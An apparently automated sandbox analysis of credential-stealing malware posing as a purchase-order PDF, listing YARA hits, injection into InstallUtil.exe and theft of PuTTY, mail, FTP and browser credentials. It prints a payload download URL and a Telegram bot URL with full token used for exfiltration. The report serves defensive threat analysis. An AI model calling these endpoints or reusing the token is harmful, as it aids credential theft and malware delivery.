Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2973425919.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 344, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7012, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525395 Sample: RFQ__PO_PO 24090041-PDF____... Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 30 api.telegram.org 2->30 32 wymascensores.com 2->32 46 Multi AV Scanner detection for domain / URL 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 54 12 other signatures 2->54 7 RFQ__PO_PO 24090041-PDF____PDF.exe 16 4 2->7         started        12 Afoagcjtqvi.exe 14 2 2->12         started        14 Afoagcjtqvi.exe 2->14         started        signatures3 52 Uses the Telegram API (likely for C&C communication) 30->52 process4 dnsIp5 34 wymascensores.com 67.212.175.162, 443, 49730, 49732 SINGLEHOP-LLCUS United States 7->34 24 C:\Users\user\AppData\...\Afoagcjtqvi.exe, PE32 7->24 dropped 26 C:\Users\...\Afoagcjtqvi.exe:Zone.Identifier, ASCII 7->26 dropped 56 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->56 58 Writes to foreign memory regions 7->58 60 Injects a PE file into a foreign processes 7->60 16 InstallUtil.exe 14 2 7->16         started        62 Antivirus detection for dropped file 12->62 64 Multi AV Scanner detection for dropped file 12->64 66 Machine Learning detection for dropped file 12->66 20 InstallUtil.exe 2 12->20         started        22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 api.telegram.org 149.154.167.220, 443, 49731, 49734 TELEGRAMRU United Kingdom 16->28 36 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->36 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->38 40 Tries to steal Mail credentials (via file / registry access) 22->40 42 Tries to harvest and steal ftp login credentials 22->42 44 Tries to harvest and steal browser information (history, passwords, etc) 22->44 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
67.212.175.162
 wymascensores.com United States
32475 SINGLEHOP-LLCUS false

Contacted Domains

Name IP Active
wymascensores.com 67.212.175.162 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument true unknown
https://wymascensores.com/rigasin/Chody.mp3 true unknown